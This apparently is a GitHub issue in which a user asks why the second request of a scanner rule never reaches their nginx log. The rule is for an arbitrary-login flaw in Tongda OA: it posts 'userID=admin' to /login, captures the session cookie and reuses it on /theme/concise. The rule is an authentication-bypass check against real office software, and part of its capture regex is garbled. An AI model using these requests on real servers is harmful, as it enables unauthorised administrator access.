Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cookie问题 #339

Open
dnshook opened this issue Apr 6, 2024 · 0 comments
Open

Cookie问题 #339

dnshook opened this issue Apr 6, 2024 · 0 comments

Comments

@dnshook
Copy link

dnshook commented Apr 6, 2024

name: 通达OA任意登录
manual: true
sets:

rules:

  • method: POST
    path: /login
    headers:
    Content-Type: text/xml; charset=UTF-8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    body: "userID=admin"
    follow_redirects: false
    continue: true
    search: |
    Set-Cookie:(?P.*?)
  • method: GET
    path: /theme/concise
    continue: true
    headers:
    Cookie: "{{cookie}}"
    expression: |
    response.body.bcontains(b"originalAlert")
    规则二我看本地的nginx日志没有发送/theme/concise这个地址
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant